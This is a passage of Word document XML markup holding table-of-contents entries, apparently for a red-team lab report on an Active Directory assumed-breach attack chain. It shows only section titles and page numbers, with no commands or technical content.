          <w:p w14:paraId="1CA8D608" w14:textId="59CF5EBB" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00312347">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="7C1F942F"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51C59F28" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   1.2 Scope &amp; Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2577B320" w14:textId="4A68A39F" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00312347">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="0F0DCFF9"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6284CCCD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   1.3 Rules of Engagement &amp; Target Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1BB1CCE3" w14:textId="310E6BDA" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00312347">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="3BDD0C90"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1FF03D14" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2. Literature and Tooling Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E63F5E4" w14:textId="4B6DAAE8" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00312347">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="0D49C299"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2A37B6E6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   2.1 Security Standards &amp; Frameworks (MITRE ATT&amp;CK, CIS, PTES, NIST)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36704D14" w14:textId="1FD20F8A" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00421A4E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="0A4F9429"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61BB2240" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   2.2 Red Team Tooling Selection &amp; Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="631DD3B4" w14:textId="030CAE4D" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00421A4E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="18FE1CEA"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29F38E5C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3. Methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7FA9325D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="7C25713A"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67A7EBB0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   3.1 Assumed-Breach Testing Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30099EFF" w14:textId="092A9C74" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00782646">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="7F27EDC9"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4375C10C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   3.2 Lab Network Setup &amp; Topology Diagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="177BB052" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="59770F38"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39DA3A78" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   3.3 Attack Lifecycle &amp; Privilege Escalation Phases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0401F094" w14:textId="781878D6" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="60068C56"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478FACB0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4. Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6DE0B181" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="76C23D04"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76429D6D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   4.1 Lab Build Specifications &amp; Target Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="749E44CC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="78298BC7"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14ABCCD9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   4.2 Active Directory Vulnerable Delegation Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DDE6731" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="1679CD21"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6CE44E59" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5. Results and Findings (12-Stage Attack Chain Narrative)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0D9E8C52" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="250CD915"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59BF2C53" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.1 Stage 1: Initial Access &amp; Foothold Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="161454FB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="0B72E6DE"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78F0C16F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.2 Stage 2: Active Directory Enumeration (BloodHound)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4739B21D" w14:textId="0AE248E9" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="3C7265DD"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520F8E71" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.3 Stage 3: Abuse of ForceChangePassword ACL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39D85CF1" w14:textId="5DEC98B8" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="6A51A33E"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0BBAA0BC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.4 Stage 4: File Share Credential Harvesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
